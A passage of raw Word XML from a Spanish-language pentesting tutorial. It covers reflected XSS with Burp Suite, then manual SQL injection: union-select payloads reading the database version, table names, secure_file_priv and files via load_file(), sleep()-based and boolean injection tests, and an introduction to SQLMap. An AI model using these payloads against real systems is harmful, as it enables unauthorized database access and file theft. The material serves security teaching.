      </w:r>
    </w:p>
    <w:p w14:paraId="08A88AF9" w14:textId="4DFA2D6C" w:rsidR="006517AF" w:rsidRDefault="006517AF" w:rsidP="000A36E7">
      <w:r>
        <w:t>Ejemplo de inyección:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD60CE" w14:textId="057FA462" w:rsidR="006517AF" w:rsidRDefault="009714DA" w:rsidP="000A36E7">
      <w:r>
        <w:t>Estamos observando que “canario” cierra una etiqueta &lt;/span&gt;, así que podríamos mandar una etiqueta que cierra y enviar un script javascript tal que así:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1F0C9" w14:textId="19B954C6" w:rsidR="009714DA" w:rsidRDefault="009714DA" w:rsidP="000A36E7">
      <w:r w:rsidRPr="009714DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5574D69A" wp14:editId="747375B7">
            <wp:extent cx="5795440" cy="130302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7691" cy="1303526"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F5DD8F" w14:textId="3CC066D2" w:rsidR="009714DA" w:rsidRDefault="009714DA" w:rsidP="000A36E7">
      <w:r>
        <w:t xml:space="preserve">En la pestaña </w:t>
      </w:r>
      <w:r w:rsidRPr="009714DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Decoder</w:t>
      </w:r>
      <w:r>
        <w:t>, podemos codificarlo en forma de URL (pulsamos en Encode as…):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C26E0" w14:textId="7B0A5211" w:rsidR="009714DA" w:rsidRDefault="009714DA" w:rsidP="009714DA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009714DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00AF2892" wp14:editId="2C1006DC">
            <wp:extent cx="6016530" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="381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30314" cy="1496942"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FB4F1C" w14:textId="4FA9DC94" w:rsidR="009714DA" w:rsidRDefault="009714DA" w:rsidP="000A36E7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tan solo copiamos y pegamos el texto obtenido en la petición de la pestaña </w:t>
      </w:r>
      <w:r w:rsidRPr="009714DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="009714DA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F5AE6" w14:textId="42800656" w:rsidR="009714DA" w:rsidRDefault="009714DA" w:rsidP="000A36E7">
      <w:r w:rsidRPr="009714DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64802473" wp14:editId="6C210648">
            <wp:extent cx="5400040" cy="1324610"/>
            <wp:effectExtent l="0" t="0" r="0"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324610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="447FF2A6" w14:textId="19569BE9" w:rsidR="009714DA" w:rsidRDefault="009714DA" w:rsidP="000A36E7">
      <w:r>
        <w:t>Y al hacer los respectivos Forwards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7EFAB" w14:textId="179C2332" w:rsidR="009714DA" w:rsidRDefault="009714DA" w:rsidP="000A36E7">
      <w:r w:rsidRPr="009714DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58973B2B" wp14:editId="11702DDD">
            <wp:extent cx="5400040" cy="2430145"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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430145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFEF992" w14:textId="0BCA1692" w:rsidR="009714DA" w:rsidRDefault="009714DA" w:rsidP="000A36E7">
      <w:r>
        <w:t>Habremos inyectado un código javascript en esta aplicación web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D0936A" w14:textId="60A5121F" w:rsidR="00846BA9" w:rsidRDefault="00846BA9" w:rsidP="000A36E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846BA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Inyecciones SQL</w:t>
      </w:r>
      <w:r w:rsidR="006B77D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manualmente</w:t>
      </w:r>
      <w:r w:rsidRPr="00846BA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2055E9E8" w14:textId="6B9E3FA3" w:rsidR="00846BA9" w:rsidRDefault="00846BA9" w:rsidP="000A36E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846BA9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B03E8A4" wp14:editId="50D73878">
            <wp:extent cx="5400040" cy="226885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268855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC4D92" w14:textId="22643C32" w:rsidR="00846BA9" w:rsidRDefault="00846BA9" w:rsidP="00846BA9">
      <w:r w:rsidRPr="00846BA9">
        <w:t>Podemos notar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que al añadir una comilla simple, hemos afectado al código de la aplicación web, mostrándonos un error de Mysql con información como la propia consulta SQL, tablas o hasta directorios. Imagina que vulneramos la consulta de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A660248" w14:textId="098C5C7F" w:rsidR="00846BA9" w:rsidRDefault="00846BA9" w:rsidP="00846BA9">
      <w:r w:rsidRPr="00846BA9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C70D063" wp14:editId="73A7DB13">
            <wp:extent cx="5400040" cy="3692525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3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692525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C51986" w14:textId="06D5F5CA" w:rsidR="00846BA9" w:rsidRDefault="00846BA9" w:rsidP="00846BA9">
      <w:r>
        <w:t>Como vemos Cerramos la consulta con ‘ y ponemos “1=1 or --  “ (detrás de las dos líneas hay un espacio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942FD14" w14:textId="65400BB7" w:rsidR="00846BA9" w:rsidRDefault="00846BA9" w:rsidP="00846BA9">
      <w:r>
        <w:t>De esta forma nos devuelve todos los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650E46AB" w14:textId="7491A31E" w:rsidR="00647990" w:rsidRPr="00647990" w:rsidRDefault="00647990" w:rsidP="00846BA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647990">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Podemos usar las consulta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEC0745" w14:textId="2BB28045" w:rsidR="00647990" w:rsidRPr="00647990" w:rsidRDefault="00647990" w:rsidP="00647990">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647990">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select null, version(), null, null, null, null, null </w:t>
      </w:r>
      <w:r w:rsidR="00353BC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB627C6" w14:textId="11E18EA3" w:rsidR="00647990" w:rsidRDefault="00647990" w:rsidP="00647990">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647990">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Al usar Union podemos concatenar dos consultas, pero es importante que ambas tengan la misma cantidad de columnas, por lo que podemos ir probando de una en una para averiguar cuantas columnas hay usando solo “null”, y una vez sepamos cuantas hay (que no devuelva error), variar la posición del dato que queramos sacar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529C17C" w14:textId="679AD345" w:rsidR="00647990" w:rsidRDefault="00647990" w:rsidP="00647990">
      <w:r>
        <w:t>Algunas funciones interesantes son:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A7E2D8" w14:textId="31045337" w:rsidR="00647990" w:rsidRDefault="00647990" w:rsidP="00815961">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>database(): Devuelve el nombre de la base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C85AF" w14:textId="17F008E1" w:rsidR="00647990" w:rsidRDefault="00647990" w:rsidP="00815961">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>version(): Devuelve la versión de MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9153F6" w14:textId="0E9FCC57" w:rsidR="00815961" w:rsidRDefault="00815961" w:rsidP="00815961">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>current_user(): Devuelve el usuario actual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC674C" w14:textId="610245D2" w:rsidR="00647990" w:rsidRDefault="00647990" w:rsidP="00647990">
      <w:r w:rsidRPr="00647990">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="543B9F67" wp14:editId="0545C77A">
            <wp:extent cx="5400040" cy="48196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481965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C2FCE" w14:textId="56653591" w:rsidR="00353BC6" w:rsidRPr="00353BC6" w:rsidRDefault="00353BC6" w:rsidP="00353BC6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353BC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select null,table_name,null,null,null,null,null from information_schema.tables -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABDEC54" w14:textId="79EF90E8" w:rsidR="00647990" w:rsidRPr="00353BC6" w:rsidRDefault="00647990" w:rsidP="00353BC6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353BC6">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>En este campo, devuelve el nombre de todas las tablas de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76971D2C" w14:textId="47662F17" w:rsidR="00353BC6" w:rsidRDefault="00353BC6" w:rsidP="00647990">
      <w:r w:rsidRPr="00353BC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36296CAF" wp14:editId="55C272E2">
            <wp:extent cx="5400040" cy="1458595"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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458595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BFAA47" w14:textId="50E62E10" w:rsidR="002535B6" w:rsidRDefault="002535B6" w:rsidP="002535B6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353BC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>' union select null,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>@@secure_file_priv</w:t>
      </w:r>
      <w:r w:rsidRPr="00353BC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">,null,null,null,null,null from information_schema.tables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C39A9" w14:textId="63DD5577" w:rsidR="002535B6" w:rsidRPr="002535B6" w:rsidRDefault="002535B6" w:rsidP="002535B6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002535B6">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Esta variable guarda una ruta donde se encuentran ficheros que la base de datos tiene disponible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D249A2F" w14:textId="028690C0" w:rsidR="002535B6" w:rsidRDefault="002535B6" w:rsidP="002535B6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002535B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B36BE34" wp14:editId="7589BEA8">
            <wp:extent cx="5400040" cy="549910"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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549910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6BBD15" w14:textId="3B0223AB" w:rsidR="002535B6" w:rsidRPr="002535B6" w:rsidRDefault="002535B6" w:rsidP="002535B6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002535B6">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Se puede llamar algún fichero ahí con la siguiente consulta imaginando que “ficheroimportante.txt” es un archivo que se encuentra en una ruta disponible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775364EC" w14:textId="2C3CC2B2" w:rsidR="002535B6" w:rsidRDefault="002535B6" w:rsidP="002535B6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353BC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>' union select null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>load_file(‘/var/lib/mysql-file/ficheroimportante.txt’)</w:t>
      </w:r>
      <w:r w:rsidRPr="00353BC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">,null,null,null,null,null from information_schema.tables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504FCE4F" w14:textId="5C1F31A2" w:rsidR="002535B6" w:rsidRPr="00353BC6" w:rsidRDefault="002535B6" w:rsidP="002535B6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CC31B0" w14:textId="038FCA89" w:rsidR="00382E67" w:rsidRPr="00382E67" w:rsidRDefault="00382E67" w:rsidP="00647990">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382E67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Descubrir si estamos inyectando código:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3DBCC9" w14:textId="355F4AFA" w:rsidR="00647990" w:rsidRDefault="002535B6" w:rsidP="00647990">
      <w:r>
        <w:t>Sin embargo, lo normal es que la aplicación web no muestre por pantalla un error SQL, eso sería demasiado obvio, para saber si un formulario es vulnerable a inyección sql, podemos hacer uso de la sentencia sleep():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60392099" w14:textId="22EA1663" w:rsidR="00873C75" w:rsidRPr="008C3D4B" w:rsidRDefault="00873C75" w:rsidP="00647990">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3D4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' union select null,sleep(20),null,null,null,null,null -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC9A4B" w14:textId="5D262D77" w:rsidR="00873C75" w:rsidRDefault="00873C75" w:rsidP="00647990">
      <w:r>
        <w:t>De esta forma, si vemos que tarda esos segundos (20) en devolver la respuesta, no cabe duda que la función Sleep se está ejecutando en la base de datos y hemos inyectado código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAB0B25" w14:textId="6D0E388F" w:rsidR="00873C75" w:rsidRDefault="00873C75" w:rsidP="00647990">
      <w:r>
        <w:t>Por supuesto, para que esto funcione, hay que conocer el número de columnas;</w:t>
      </w:r>
      <w:r w:rsidRPr="00873C75">
        <w:t xml:space="preserve"> el número de columnas siempre suele ser un número reducido (no más de 10-20) por lo tanto no lleva mucho tiempo recorrer todo el espacio de pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CBE0F" w14:textId="1BB049E0" w:rsidR="006B77D1" w:rsidRDefault="006B77D1" w:rsidP="00647990">
      <w:r>
        <w:t>Otra forma sería</w:t>
      </w:r>
      <w:r w:rsidR="00382E67">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EEB691" w14:textId="3BFE69C6" w:rsidR="006B77D1" w:rsidRPr="008C3D4B" w:rsidRDefault="006B77D1" w:rsidP="008C3D4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3D4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eliezer’ and ‘h’=’h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5FC72E" w14:textId="2A2CA573" w:rsidR="006B77D1" w:rsidRDefault="006B77D1" w:rsidP="00382E67">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006B77D1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7BF95F" wp14:editId="511DBFBD">
            <wp:extent cx="5217160" cy="736807"/>
            <wp:effectExtent l="0" t="0" r="2540" b="63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24356" cy="737823"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD4026C" w14:textId="67E90FCF" w:rsidR="006B77D1" w:rsidRDefault="006B77D1" w:rsidP="00647990">
      <w:r>
        <w:t>Como podemos observar, está ignorando que h=h, no devuelve error porque básicamente estamos introduciendo un código que, aunque no devuelve resultado, es satisfactoriamente ignorado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731061B2" w14:textId="760C9450" w:rsidR="00382E67" w:rsidRDefault="00382E67" w:rsidP="00647990">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A continuación debemos poner una consulta idéntica pero que no se cumpla, y si nos da error, tenemos la certeza de que no funciona, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F167148" w14:textId="2B7039CE" w:rsidR="00382E67" w:rsidRDefault="00382E67" w:rsidP="00382E67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3D4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eliezer’ and ‘h’=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B666536" w14:textId="24B276C6" w:rsidR="00815961" w:rsidRDefault="00815961" w:rsidP="00815961">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815961">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C50F25F" wp14:editId="086EFB7C">
            <wp:extent cx="4473328" cy="2255715"/>
            <wp:effectExtent l="0" t="0" r="381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73328" cy="2255715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8362A4" w14:textId="3F6EC7B4" w:rsidR="00815961" w:rsidRPr="00815961" w:rsidRDefault="00815961" w:rsidP="00815961">
      <w:r w:rsidRPr="00815961">
        <w:t>Como podemos ver, al poner algo falso, nos devuelve un error, y es lógico, pues no encuentra que se cumplan las dos condiciones anteriores (es imposible que h=e).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA2C96E" w14:textId="77777777" w:rsidR="00382E67" w:rsidRDefault="00382E67" w:rsidP="00647990"/>
    <w:p w14:paraId="69B7B01E" w14:textId="3E466F27" w:rsidR="006B77D1" w:rsidRDefault="006B77D1" w:rsidP="006B77D1">
      <w:pPr>
        <w:ind w:left="360"/>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SQLMap</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B6E">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18DAB1AC" w14:textId="5EA0068F" w:rsidR="00336DAD" w:rsidRDefault="00815961" w:rsidP="000A4C7F">
      <w:r w:rsidRPr="000A4C7F">
        <w:t xml:space="preserve">SqlMap </w:t>
      </w:r>
      <w:r w:rsidR="000A4C7F">
        <w:t>es una herramienta que nos ayuda a automatizar todo el proceso de inyección SQL</w:t>
      </w:r>
      <w:r w:rsidR="00336DAD">
        <w:t>. Es capaz de leer peticiones exportadas desde Burpsuite, para exportar una petición en Burpsuite, click derecho en la petición y Copy to File (Previamente debemos interceptar nuestra petición Cliente-Servidor):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C287CD5" w14:textId="59389996" w:rsidR="00336DAD" w:rsidRPr="000A4C7F" w:rsidRDefault="00336DAD" w:rsidP="000A4C7F">
      <w:r w:rsidRPr="00336DAD">
        <w:rPr>
